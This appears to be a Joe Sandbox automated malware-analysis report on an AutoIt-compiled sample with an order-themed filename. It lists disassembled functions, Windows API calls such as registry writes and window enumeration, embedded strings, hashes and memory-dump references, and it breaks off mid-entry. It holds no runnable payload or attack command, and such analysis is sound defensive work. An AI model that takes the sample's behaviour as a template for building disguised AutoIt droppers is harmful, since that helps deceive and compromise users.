Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 7bd38733b2008d28acd780992e3c3245ca1dd336451a6bc20c2b3c87aba28f3f
Instruction ID: 772b70500764f947b2549a3380184186526abbf3af67c980f925d5c2611f14e1
Opcode Fuzzy Hash: 7bd38733b2008d28acd780992e3c3245ca1dd336451a6bc20c2b3c87aba28f3f
Instruction Fuzzy Hash: 31B14F71A0120A9FDB14DFA8DC45BEE7BB4FF08314F11422AFA15A62E0D7789891CB59

Function 00463639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00463735
RegCreateKeyExW.ADVAPI32(?,?,00000000,0049DC00,00000000,?,00000000,?,?), ref: 004637A3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 004637EB
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00463874
RegCloseKey.ADVAPI32(?), ref: 00463B94
RegCloseKey.ADVAPI32(00000000), ref: 00463BA1

Strings

REG_MULTI_SZ, xrefs: 0046395C
REG_SZ, xrefs: 004638B2
REG_EXPAND_SZ, xrefs: 00463811
REG_QWORD, xrefs: 00463AE2
REG_DWORD, xrefs: 00463A65
REG_BINARY, xrefs: 00463B2F

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 846b4e76aa58ba0a3af467e772e0b84d1e5405eece07c09e9d90d3262a585ea1
Instruction ID: 94f16537412128840b1b23fcea22bb683396cf897e5eede4ab9d45138d76c91a
Opcode Fuzzy Hash: 846b4e76aa58ba0a3af467e772e0b84d1e5405eece07c09e9d90d3262a585ea1
Instruction Fuzzy Hash: C8026F756006019FCB14DF25C851A1EB7E5FF88714F04846EF9899B3A2DB38ED41CB8A

Function 00466BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00466C56
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00466D16

Strings

FINDITEM, xrefs: 00466E81
ISSELECTED, xrefs: 00466D21
VIEWCHANGE, xrefs: 00466ECD
GETTEXT, xrefs: 00466CBF
GETSELECTEDCOUNT, xrefs: 00466CF9
GETSELECTED, xrefs: 00466E3C
SELECTINVERT, xrefs: 00466DDE
SELECTCLEAR, xrefs: 00466D8D
GETSUBITEMCOUNT, xrefs: 00466CA1
SELECTALL, xrefs: 00466D75
DESELECT, xrefs: 00466DFC
SELECT, xrefs: 00466DA8
GETITEMCOUNT, xrefs: 00466C84

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 24874a4f3071fbddfde59c95026feb1b858d2cef97eed39c8db9e114504236e3
Instruction ID: efac7140647597b4e0a4d800608fbc95c45418c52914f72453b713750b31682f
Opcode Fuzzy Hash: 24874a4f3071fbddfde59c95026feb1b858d2cef97eed39c8db9e114504236e3
Instruction Fuzzy Hash: 80A1A7742042419FCB14EF25C951A6BB3A5FF84318F11496FB856673D2EB38EC06CB9A

Function 0043CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0043CF91
__swprintf.LIBCMT ref: 0043D032
_wcscmp.LIBCMT ref: 0043D045
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0043D09A
_wcscmp.LIBCMT ref: 0043D0D6
GetClassNameW.USER32(?,?,00000400), ref: 0043D10D
GetDlgCtrlID.USER32(?), ref: 0043D15F
GetWindowRect.USER32(?,?), ref: 0043D195
GetParent.USER32(?), ref: 0043D1B3
ScreenToClient.USER32(00000000), ref: 0043D1BA
GetClassNameW.USER32(?,?,00000100), ref: 0043D234
_wcscmp.LIBCMT ref: 0043D248
GetWindowTextW.USER32(?,?,00000400), ref: 0043D26E
_wcscmp.LIBCMT ref: 0043D282

Strings

%s%u, xrefs: 0043D02C

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
String ID: %s%u
API String ID: 3119225716-679674701
Opcode ID: 1c52813d1dd22c810bf321a69279f4fa802cf737a72b6e5702cafbb6e43a2120
Instruction ID: 24840aa67b1d37cee4f9ed2b757ca5224d0e7bcabf0401134b637d571f0a2458
Opcode Fuzzy Hash: 1c52813d1dd22c810bf321a69279f4fa802cf737a72b6e5702cafbb6e43a2120
Instruction Fuzzy Hash: D6A1E271A04306AFD714DF64E884FABB7A8FF48354F00492BF95993290DB38EA45CB95

Function 0043D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0043D8EB
_wcscmp.LIBCMT ref: 0043D8FC
GetWindowTextW.USER32(00000001,?,00000400), ref: 0043D924
CharUpperBuffW.USER32(?,00000000), ref: 0043D941
_wcscmp.LIBCMT ref: 0043D95F
_wcsstr.LIBCMT ref: 0043D970
GetClassNameW.USER32(00000018,?,00000400), ref: 0043D9A8
_wcscmp.LIBCMT ref: 0043D9B8
GetWindowTextW.USER32(00000002,?,00000400), ref: 0043D9DF
GetClassNameW.USER32(00000018,?,00000400), ref: 0043DA28
_wcscmp.LIBCMT ref: 0043DA38
GetClassNameW.USER32(00000010,?,00000400), ref: 0043DA60
GetWindowRect.USER32(00000004,?), ref: 0043DAC9

Strings

@, xrefs: 0043D8C6
ThumbnailClass, xrefs: 0043D9B3, 0043DA33

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 57eaeece17d193142035803e19f4c8271cdf4de3042e5770e13f33008b5824d2
Instruction ID: eb4b748b181ce7837a0a3d84f11938d7b11684f0c71fda1ffb2743c464e57e2d
Opcode Fuzzy Hash: 57eaeece17d193142035803e19f4c8271cdf4de3042e5770e13f33008b5824d2
Instruction Fuzzy Hash: 9681D2714083059BDB04DF10E981FAB7BA8EF48308F04546FFD899A196DB38ED45CBA9

Function 0043D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0043D753

Strings

[CLASS:, xrefs: 0043D7A3
REGEXP=, xrefs: 0043D768
[HANDLE:, xrefs: 0043D75F
LAST, xrefs: 0043D718
[LAST, xrefs: 0043D800
[ALL, xrefs: 0043D7F9
ALL, xrefs: 0043D7E7
[REGEXPTITLE:, xrefs: 0043D77B
HANDLE=, xrefs: 0043D74C
CLASSNAME=, xrefs: 0043D790
[ACTIVE, xrefs: 0043D740
ACTIVE, xrefs: 0043D72E

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: d72ac36c6838073e3be21c9fe6d51c1cff5482bf710ef53d0e759e872d46c576
Instruction ID: 668cfd7b102cdb3b06fc8f50abdc480de79f1751c551137aa4085a6d09ebe7cd
Opcode Fuzzy Hash: d72ac36c6838073e3be21c9fe6d51c1cff5482bf710ef53d0e759e872d46c576
Instruction Fuzzy Hash: C4318F31A44205A6DA18FA61EE53FEE73749F24708F70012FF412710D1EFADBA14866D

Function 0043EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0043EAB0
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0043EAC2
SetWindowTextW.USER32(?,?), ref: 0043EAD9
GetDlgItem.USER32(?,000003EA), ref: 0043EAEE
SetWindowTextW.USER32(00000000,?), ref: 0043EAF4
GetDlgItem.USER32(?,000003E9), ref: 0043EB04
SetWindowTextW.USER32(00000000,?), ref: 0043EB0A
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0043EB2B
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0043EB45
GetWindowRect.USER32(?,?), ref: 0043EB4E
SetWindowTextW.USER32(?,?), ref: 0043EBB9
GetDesktopWindow.USER32 ref: 0043EBBF
GetWindowRect.USER32(00000000), ref: 0043EBC6
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0043EC12
GetClientRect.USER32(?,?), ref: 0043EC1F
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0043EC44
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0043EC6F

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 2ee3f3f24463f46bb3e0f190fbf58a7f298feff8747d48830cd82ce27d0a8a87
Instruction ID: 76431d1e8bf3edbe85f4478968f4af4cc14dd66677a52f7337c03f4cbddb23bd
Opcode Fuzzy Hash: 2ee3f3f24463f46bb3e0f190fbf58a7f298feff8747d48830cd82ce27d0a8a87
Instruction Fuzzy Hash: 21514C71901709AFDB21EFA9CD85E6EBBB5FF08704F00492DE586A26E0D774A905CB14

Function 004579B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 004579C6
LoadCursorW.USER32(00000000,00007F00), ref: 004579D1
LoadCursorW.USER32(00000000,00007F03), ref: 004579DC
LoadCursorW.USER32(00000000,00007F8B), ref: 004579E7
LoadCursorW.USER32(00000000,00007F01), ref: 004579F2
LoadCursorW.USER32(00000000,00007F81), ref: 004579FD
LoadCursorW.USER32(00000000,00007F88), ref: 00457A08
LoadCursorW.USER32(00000000,00007F80), ref: 00457A13
LoadCursorW.USER32(00000000,00007F86), ref: 00457A1E
LoadCursorW.USER32(00000000,00007F83), ref: 00457A29
LoadCursorW.USER32(00000000,00007F85), ref: 00457A34
LoadCursorW.USER32(00000000,00007F82), ref: 00457A3F
LoadCursorW.USER32(00000000,00007F84), ref: 00457A4A
LoadCursorW.USER32(00000000,00007F04), ref: 00457A55
LoadCursorW.USER32(00000000,00007F02), ref: 00457A60
LoadCursorW.USER32(00000000,00007F89), ref: 00457A6B
GetCursorInfo.USER32(?), ref: 00457A7B

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: bbaa7a165c13fa0a2e711beefe9cfe2d29931bb2c56d606473d63680cec3d242
Instruction ID: cf069056e3f50e332e53d565adb2054a650a155eab991a62512326a223ee644b
Opcode Fuzzy Hash: bbaa7a165c13fa0a2e711beefe9cfe2d29931bb2c56d606473d63680cec3d242
Instruction Fuzzy Hash: F43117B0D083196ADB109FB69C8995FBFE8FF04750F50453BA50DE7281DA7CA9048F95

Function 0040C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON

Download Yara Rule

APIs

Part of subcall function 0041E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0040C8B7,?,00002000,?,?,00000000,?,0040419E,?,?,?,0049DC00), ref: 0041E984

Part of subcall function 0040660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004053B1,?,?,004061FF,?,00000000,00000001,00000000), ref: 0040662F

__wsplitpath.LIBCMT ref: 0040C93E

Part of subcall function 00421DFC: __wsplitpath_helper.LIBCMT ref: 00421E3C

_wcscpy.LIBCMT ref: 0040C953
_wcscat.LIBCMT ref: 0040C968
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0040C978
SetCurrentDirectoryW.KERNEL32(?), ref: 0040CABE

Part of subcall function 0040B337: _wcscpy.LIBCMT ref: 0040B36F

Strings

AU3!, xrefs: 0040C90C
>>>AUTOIT SCRIPT<<<, xrefs: 0047311B
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00473098
Error opening the file, xrefs: 004730B4, 0047313D
EA06, xrefs: 004730C9
Unterminated string, xrefs: 00473470
Bad directive syntax error, xrefs: 00473429

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2258743419-1018226102
Opcode ID: a5ccc80205a59097dfb850748acb3aec9fed975a9593b10d8d655776d1918edc
Instruction ID: 140721dde5c93db0a4831f506c98d94b1ca13cdcddd4f68ebbd5b188d2806d8f
Opcode Fuzzy Hash: a5ccc80205a59097dfb850748acb3aec9fed975a9593b10d8d655776d1918edc
Instruction Fuzzy Hash: C3129171508341DFC724DF25C881AAFBBE5AF98308F40492FF589A3291DB38D949DB5A

Function 0046CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0046CEFB
DestroyWindow.USER32(?,?), ref: 0046CF73
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0046CFF4
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0046D016
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0046D025
DestroyWindow.USER32(?), ref: 0046D042
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0046D075
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0046D094
GetDesktopWindow.USER32 ref: 0046D0A9
GetWindowRect.USER32(00000000), ref: 0046D0B0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0046D0C2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0046D0DA

Part of subcall function 0041B526: GetWindowLongW.USER32(?,000000EB), ref: 0041B537

Strings

tooltips_class32, xrefs: 0046CFED, 0046D06E
0, xrefs: 0046CF1B

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
String ID: 0$tooltips_class32
API String ID: 3877571568-3619404913
Opcode ID: 69e11f21e76226eeef5ed186ccebed8e6450f363a17f54aa29d91dfe0266152b
Instruction ID: 4dc2e84ce978025e6b17c84472f7ac8ce1a7427ed809a84a7c26ecdd8771ffc4
Opcode Fuzzy Hash: 69e11f21e76226eeef5ed186ccebed8e6450f363a17f54aa29d91dfe0266152b
Instruction Fuzzy Hash: 6C71BF70A40305AFD720CF28CC85F6A77E5EB89708F14452EF985973A1E738E942CB5A

Function 0046F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

DragQueryPoint.SHELL32(?,?), ref: 0046F37A

Part of subcall function 0046D7DE: ClientToScreen.USER32(?,?), ref: 0046D807
Part of subcall function 0046D7DE: GetWindowRect.USER32(?,?), ref: 0046D87D
Part of subcall function 0046D7DE: PtInRect.USER32(?,?,0046ED5A), ref: 0046D88D

SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F3EE
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F411
_wcscat.LIBCMT ref: 0046F441
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F458
SendMessageW.USER32(?,000000B0,?,?), ref: 0046F471
SendMessageW.USER32(?,000000B1,?,?), ref: 0046F488
SendMessageW.USER32(?,000000B1,?,?), ref: 0046F4AA
DragFinish.SHELL32(?), ref: 0046F4B1
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F59C

Strings

@GUI_DROPID, xrefs: 0046F4D1
@GUI_DRAGFILE, xrefs: 0046F54B
@GUI_DRAGID, xrefs: 0046F510

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: f969b712b5967636f6a1032539b4ea73a817815144a0e6eb80d8ffad35820105
Instruction ID: 542b244a70a4be53351f3959c13a29a11e7469c6b76638349d2aa62145188beb
Opcode Fuzzy Hash: f969b712b5967636f6a1032539b4ea73a817815144a0e6eb80d8ffad35820105
Instruction Fuzzy Hash: 21613B71508304AFC301EF65DC85E9FBBF8EF89714F000A2EF595A21A1DB759A09CB5A

Function 0044AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 0044AB3D
VariantCopy.OLEAUT32(?,?), ref: 0044AB46
VariantClear.OLEAUT32(?), ref: 0044AB52
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0044AC40
__swprintf.LIBCMT ref: 0044AC70
VarR8FromDec.OLEAUT32(?,?), ref: 0044AC9C
VariantInit.OLEAUT32(?), ref: 0044AD4D
SysFreeString.OLEAUT32(00000016), ref: 0044ADDF
VariantClear.OLEAUT32(?), ref: 0044AE35
VariantClear.OLEAUT32(?), ref: 0044AE44
VariantInit.OLEAUT32(00000000), ref: 0044AE80

Strings

Default, xrefs: 0044ACFD
%4d%02d%02d%02d%02d%02d, xrefs: 0044AC6A

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 1ef3e23069a869df427bada7a0b431b08265a902c8dc5570a096ee9aa8230e50
Instruction ID: b7343743ca07c40412d491ea83dedac3c5837e075b3f85f41d6defa909029fd8
Opcode Fuzzy Hash: 1ef3e23069a869df427bada7a0b431b08265a902c8dc5570a096ee9aa8230e50
Instruction Fuzzy Hash: F7D11671A40205DBEB109F55C885BAEB7B5FF04700F18846BE5059B281DB3CEC66DB9B

Function 0046716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 004671FC
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00467247

Strings

EXPAND, xrefs: 004672E1
